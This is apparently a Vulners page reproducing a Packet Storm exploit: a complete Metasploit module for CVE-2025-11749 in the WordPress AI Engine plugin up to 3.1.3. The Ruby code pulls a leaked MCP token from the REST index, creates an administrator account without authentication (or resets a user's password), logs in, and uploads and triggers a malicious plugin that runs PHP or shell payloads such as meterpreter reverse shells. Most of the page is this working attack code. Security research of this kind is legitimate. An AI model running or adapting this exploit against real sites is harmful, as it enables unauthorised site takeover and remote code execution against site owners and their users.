Lucene search
K

📄 WordPress AI Engine 3.1.3 Remote Code Execution

🗓️ 04 Dec 2025 00:00:00 · Reported by Khaled Alenazi, dledda-r7, Valentin Lobstein, Emiliano Versini · Type:
packetstorm
 packetstorm
🔗 packetstorm.news · 👁 144 Views

Exploits unauthenticated admin creation in WordPress AI Engine ≤3.1.3 to enable remote code execution.

Related
Code
##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Payload::Php
      include Msf::Exploit::FileDropper
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::Remote::HTTP::Wordpress
    
      prepend Msf::Exploit::Remote::AutoCheck
    
      ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
      SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i
    
      # Declares the module metadata (name, description, authors, references,
      # targets, notes) and registers the USERNAME / PASSWORD / EMAIL options
      # used for the administrator account this module creates.
      #
      # @param info [Hash] metadata forwarded through update_info to the parent constructor
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
            'Description' => %q{
              This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
              (versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
              via the MCP (Model Context Protocol) endpoint without authentication. The module supports
              both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
              account is created, the module uploads and executes a malicious plugin to achieve remote
              code execution (RCE).
            },
            'Author' => [
              'Emiliano Versini',                             # Vulnerability discovery
              'Khaled Alenazi (Nxploited)',                   # PoC
              'Valentin Lobstein <chocapikk[at]leakix.net>',  # Metasploit module
              'dledda-r7'                                     # Reviewer
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2025-11749'],
              ['URL', 'https://github.com/Nxploited/CVE-2025-11749']
            ],
            'Platform' => %w[php unix linux win],
            'Arch' => [ARCH_PHP, ARCH_CMD],
            'DisclosureDate' => '2025-11-04',
            'DefaultTarget' => 0, # index into 'Targets' below, i.e. 'PHP In-Memory'
            'Privileged' => false,
            # One PHP target plus two command-shell targets (Unix/Linux and Windows).
            'Targets' => [
              [
                'PHP In-Memory',
                {
                  'Platform' => 'php',
                  'Arch' => ARCH_PHP
                  # tested with php/meterpreter/reverse_tcp
                }
              ],
              [
                'Unix/Linux Command Shell',
                {
                  'Platform' => %w[unix linux],
                  'Arch' => ARCH_CMD
                  # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
                }
              ],
              [
                'Windows Command Shell',
                {
                  'Platform' => 'win',
                  'Arch' => ARCH_CMD
                  # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
                }
              ]
            ],
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
            }
          )
        )
    
        # All three options are required; their default values are produced by
        # Faker calls that run each time this constructor executes.
        register_options(
          [
            OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
            OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
            OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
          ]
        )
      end
    
      # Decides whether the target looks exploitable.
      #
      # Order of checks: WordPress reachable -> plugin readme version (fixed in
      # 3.1.4) -> MCP token discoverable through the REST index.
      #
      # @return a CheckCode: Unknown when WordPress is not reachable, Safe when
      #   the readme check says so or no token is found, Appears otherwise
      def check
        return CheckCode::Unknown unless wordpress_and_online?

        readme_verdict = check_plugin_version_from_readme('ai-engine', '3.1.4')
        return readme_verdict if readme_verdict == CheckCode::Safe

        # The token is stored on the instance so #exploit can reuse it.
        @token = find_token
        if @token
          CheckCode::Appears
        else
          CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.')
        end
      end
    
      # Runs the full chain: locate the MCP token, create (or take over) an
      # administrator account through the MCP endpoint, log in with it, then
      # upload and trigger the payload plugin.
      #
      # Aborts through fail_with when WordPress is not detected, when no token
      # is found, when the account cannot be created, or when the login fails.
      def exploit
        unless wordpress_and_online?
          fail_with(Failure::NotFound, 'The target does not appear to be using WordPress')
        end

        # Reuse the token found by #check when it already ran.
        @token ||= find_token
        unless @token
          fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.')
        end

        login = datastore['USERNAME']
        secret = datastore['PASSWORD']
        mail = datastore['EMAIL']

        creation = create_admin_user(@token, login, secret, mail)
        case creation
        when false
          fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.')
        when :user_exists
          # The account is already there: try to reset its password instead.
          print_warning('User already exists, updating password and continuing exploitation...')
          update_user_password(@token, login, secret)
        end

        session_cookie = wordpress_login(login, secret)
        unless session_cookie
          hint = creation == :user_exists ? ' User may exist with a different password.' : ''
          fail_with(Failure::UnexpectedReply, 'Failed to log in to WordPress admin.' + hint)
        end

        upload_and_execute_payload(session_cookie)
      end
    
      # REST API helpers
      # Sends a request to the WordPress REST API.
      #
      # The pretty-permalink endpoint (`<base>/wp-json/<rest_path>`) is tried
      # first; if it does not answer with a 2xx status the same request is sent
      # to `<base>/?rest_route=<rest_path>`.
      #
      # Any 2xx status from the first endpoint is final. A 204 in particular is
      # treated as success by send_mcp_tool_call, so it must not trigger the
      # fallback: that would send a non-idempotent POST (e.g. user creation) a
      # second time.
      #
      # @param rest_path [String] REST route, e.g. '/' or '/mcp/v1/<token>/sse'
      # @param method [String] HTTP verb; 'POST' requests are sent as application/json
      # @param data [String, nil] request body
      # @return the response of the endpoint that was used last, or nil when
      #   send_request_cgi returned nil for it
      def send_rest_request(rest_path, method: 'GET', data: nil)
        opts = {
          'method' => method,
          'ctype' => method == 'POST' ? 'application/json' : nil,
          'data' => data
        }

        pretty_uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
        res = send_request_cgi(opts.merge('uri' => pretty_uri))
        return res if res && (200..299).cover?(res.code)

        vars_get = { 'rest_route' => rest_path }
        send_request_cgi(opts.merge('uri' => normalize_uri(target_uri.path), 'vars_get' => vars_get))
      end
    
      # Fetches the REST API index ('/') and pulls the MCP token out of its
      # route list.
      #
      # @return [String, nil] the token, or nil when none could be extracted
      def find_token
        index_response = send_rest_request('/')
        extract_token_from_routes(index_response)
      end
    
      # Extracts the MCP token from a REST API index response.
      #
      # The index is expected to be a JSON object whose 'routes' member is keyed
      # by route path; the token is the path segment of the first key shaped
      # like `/mcp/v1/<token>/sse`.
      #
      # @param res [#code, #get_json_document, nil] HTTP response of the REST index
      # @return [String, nil] the token, or nil when the response is missing,
      #   not a 200, not a JSON object, or exposes no matching route
      def extract_token_from_routes(res)
        return nil unless res&.code == 200

        # The parsed document may be an Array or a scalar when the server sends
        # unexpected JSON; only a Hash can carry 'routes'.
        document = res.get_json_document
        return nil unless document.is_a?(Hash)

        routes = document['routes']
        return nil unless routes.is_a?(Hash)

        # \A / \z anchor the whole key; ^ / $ would also accept a match on a
        # single line of a multi-line key.
        mcp_route = %r{\A/mcp/v1/([^/]+)/sse\z}
        routes.each_key do |route|
          next unless route.is_a?(String)

          token = route[mcp_route, 1]
          # A segment literally named 'sse' is not accepted as a token.
          return token if token && token != 'sse'
        end
        nil
      end
    
      # MCP API helpers
      # Sends a request to an MCP route below `/mcp/v1/<token>/`.
      #
      # @param token [String] MCP token taken from the REST index
      # @param segments [Array<String>] path segments appended after the token
      # @param method [String] HTTP verb
      # @param data [String, nil] request body
      # @return whatever send_rest_request returns for the built path
      def send_mcp_request(token, segments, method: 'GET', data: nil)
        tail = segments.join('/')
        mcp_path = format('/mcp/v1/%s/%s', token, tail)
        send_rest_request(mcp_path, method: method, data: data)
      end
    
      # Builds the JSON-RPC 2.0 body of an MCP `tools/call` request.
      #
      # @param tool_name [String] name of the MCP tool to invoke
      # @param arguments [Hash] arguments passed to the tool
      # @return [String] serialized JSON with a random request id in 1..999_999
      def build_mcp_payload(tool_name, arguments)
        call_params = { 'name' => tool_name, 'arguments' => arguments }
        envelope = {
          'jsonrpc' => '2.0',
          'id' => rand(1..999_999),
          'method' => 'tools/call',
          'params' => call_params
        }
        envelope.to_json
      end
    
      # Invokes an MCP tool and hands back the raw `result.content` member of
      # the JSON-RPC reply without interpreting it.
      #
      # @param token [String] MCP token
      # @param tool_name [String] MCP tool to call
      # @param arguments [Hash] tool arguments
      # @return the value at result/content, or nil when there is no response,
      #   the status is not 200, or the reply is not a JSON object
      def send_mcp_tool_call_raw(token, tool_name, arguments)
        request_body = build_mcp_payload(tool_name, arguments)
        response = send_mcp_request(token, ['sse'], method: 'POST', data: request_body)
        return nil unless response && response.code == 200

        document = response.get_json_document
        document.is_a?(Hash) ? document.dig('result', 'content') : nil
      end
    
      # Invokes an MCP tool and classifies the outcome.
      #
      # Classification, in order:
      # * no response or a status other than 200/204 -> false; 204 -> true
      # * reply is not a JSON object -> false
      # * JSON-RPC `error` object -> :user_exists when its code is
      #   'existing_user_login' or its message / the body matches ERROR_PATTERN,
      #   otherwise false
      # * `result.isError == true` -> :user_exists when the body matches
      #   ERROR_PATTERN, otherwise false
      # * otherwise true when a content text or the body matches
      #   SUCCESS_PATTERN, :user_exists when the body matches ERROR_PATTERN
      #
      # An explicit error reply is never reported as success, even when its text
      # happens to contain words such as "created" or "success".
      #
      # @param token [String] MCP token
      # @param tool_name [String] MCP tool to call
      # @param arguments [Hash] tool arguments
      # @return [true, false, Symbol] true, false or :user_exists
      def send_mcp_tool_call(token, tool_name, arguments)
        payload = build_mcp_payload(tool_name, arguments)
        res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
        return false unless res
        return true if res.code == 204
        return false unless res.code == 200

        json_response = res.get_json_document
        return false unless json_response.is_a?(Hash)

        body = res.body.to_s
        error = json_response['error']
        if error.is_a?(Hash)
          return :user_exists if error['code'] == 'existing_user_login'
          return :user_exists if error['message'].to_s.match?(ERROR_PATTERN) || body.match?(ERROR_PATTERN)

          # Any other JSON-RPC error is a failure; do not let the loose
          # SUCCESS_PATTERN body match below turn it into a success.
          return false
        end

        # Tolerate a malformed reply: only a Hash result with an Array content
        # of Hash items is inspected.
        result = json_response['result']
        result = {} unless result.is_a?(Hash)
        content = result['content']
        items = content.is_a?(Array) ? content.select { |item| item.is_a?(Hash) } : []
        texts = items.map { |item| item['text'].to_s }

        # A tool result flagged as an error is handled like an error object.
        if result['isError'] == true
          return body.match?(ERROR_PATTERN) ? :user_exists : false
        end

        return true if texts.any? { |text| text.match?(SUCCESS_PATTERN) }
        return :user_exists if body.match?(ERROR_PATTERN)
        return true if body.match?(SUCCESS_PATTERN)

        false
      end
    
      # User management
      # Looks up the numeric ID of a user through the `wp_get_users` MCP tool.
      #
      # Each content item's 'text' is parsed as JSON (a single object or an
      # array of objects). The first item that contains an entry whose
      # 'user_login' equals +username+ and that carries an 'ID' wins.
      #
      # The reply comes from the target, so anything that is not shaped as
      # expected (unparsable text, non-object list entries such as numbers or
      # null) is skipped rather than allowed to raise.
      #
      # @param token [String] MCP token
      # @param username [String] login to look for (exact match)
      # @return [Integer, nil] the user ID, or nil when it cannot be determined
      def get_user_id(token, username)
        arguments = {
          'search' => username,
          'search_columns' => ['user_login']
        }

        result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
        return nil unless result_content.is_a?(Array)

        result_content.each do |item|
          next unless item.is_a?(Hash) && item['text']

          begin
            parsed = JSON.parse(item['text'].to_s)
          rescue JSON::ParserError
            next
          end

          # Normalize to a list and keep only objects; indexing a number or nil
          # with a string key would raise.
          entries = parsed.is_a?(Array) ? parsed : [parsed]
          user = entries.select { |entry| entry.is_a?(Hash) }.find { |entry| entry['user_login'] == username }
          return user['ID'].to_i if user && user['ID']
        end

        nil
      end
    
      # Asks the `wp_create_user` MCP tool to create an account with the
      # 'administrator' role.
      #
      # @param token [String] MCP token
      # @param username [String] login of the new account
      # @param password [String] password of the new account
      # @param email [String] e-mail address of the new account
      # @return whatever send_mcp_tool_call returns (true, false or :user_exists)
      def create_admin_user(token, username, password, email)
        account = { 'user_login' => username, 'user_email' => email, 'user_pass' => password }
        send_mcp_tool_call(token, 'wp_create_user', account.merge('role' => 'administrator'))
      end
    
      # Resets the password of an existing user through the `wp_update_user`
      # MCP tool.
      #
      # @param token [String] MCP token
      # @param username [String] login of the account to update
      # @param password [String] new password
      # @return false when the user ID cannot be resolved, otherwise the result
      #   of send_mcp_tool_call (a warning is printed when that result is falsy)
      def update_user_password(token, username, password)
        target_id = get_user_id(token, username)
        return false unless target_id

        changes = { 'ID' => target_id, 'fields' => { 'user_pass' => password } }
        send_mcp_tool_call(token, 'wp_update_user', changes).tap do |outcome|
          print_warning('Password update may have failed, attempting login anyway...') unless outcome
        end
      end
    
      # Payload execution
      # Uploads a generated plugin with the given admin session and requests the
      # payload file inside it to trigger execution.
      #
      # Plugin and payload names are randomized ("wp_xxxxx" / "ajax_xxxxx"). The
      # dropped files and the plugin directory are registered for cleanup.
      #
      # @param admin_cookie session cookie returned by wordpress_login
      def upload_and_execute_payload(admin_cookie)
        plugin_name, payload_name = %w[wp ajax].map do |prefix|
          "#{prefix}_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
        end
        payload_file = "#{payload_name}.php"

        archive = generate_plugin(plugin_name, payload_name)
        uploaded = wordpress_upload_plugin(plugin_name, archive.pack, admin_cookie)
        fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

        register_files_for_cleanup(payload_file, "#{plugin_name}.php")
        register_dir_for_cleanup("../#{plugin_name}")

        # Requesting the payload file is what triggers it.
        trigger_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
        send_request_cgi('uri' => trigger_uri, 'method' => 'GET')
      end
    end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Dec 2025 00:00 · Current
8.2 · High risk
Vulners AI Score: 8.2
CVSS 3.1: 9.8
EPSS: 0.85741
SSVC
144